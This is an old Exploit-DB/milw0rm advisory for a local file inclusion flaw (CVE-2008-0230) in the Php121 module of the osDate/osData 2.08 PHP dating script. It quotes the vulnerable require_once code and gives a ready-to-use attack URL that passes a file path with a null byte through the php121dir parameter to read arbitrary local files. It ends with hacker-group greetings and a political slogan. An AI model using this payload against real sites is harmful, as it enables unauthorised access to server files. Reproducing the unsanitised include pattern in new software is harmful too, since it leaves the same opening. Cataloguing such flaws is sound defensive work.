osData <= 2.08 Modules Php121 - Local File Inclusion Vulnerability

2008-01-09T00:00:00
ID EDB-ID:4870
Type exploitdb
Reporter Cold Zero
Modified 2008-01-09T00:00:00

Description

osData <= 2.08 Modules Php121 Local File Inclusion Vulnerability. CVE-2008-0230. Webapps exploit for php platform

                                        
                                            =========================================================================
osData &lt;= 2.08 Modules Php121 Local File Include Vulnerability 
=========================================================================
Found by :
Cold z3ro , http://www.Hackteach.org/cc/
=========================================================================
Download :
http://gscripts.net/free-php-scripts/Dating_Scripts/osDate/details.html
=========================================================================
Bug :
if (file_exists($php121dir . "php121config.php")) {          &lt;= line 34
		require_once($php121dir . "php121config.php");
	} else {
		die ("PHP121 configuration file does not exist!");
}
=========================================================================
About :
osData is php dating script fully integrates with major bulletin boards 
(phpBB, vBulletin ) and FlashChat and provides several payment modules, 
multiple skins, and free upgrade .
=========================================================================
Usage :
http://host/osData/php121/php121db.php?php121dir=[ File ]%00
=========================================================================
Greets : 
Hack Teach Masters And Members , Xp10 Masters
=========================================================================
Plestine Hackers SQl Command :
0 update palestine set palestine = 'Long live My Homeland';
=========================================================================

# milw0rm.com [2008-01-09]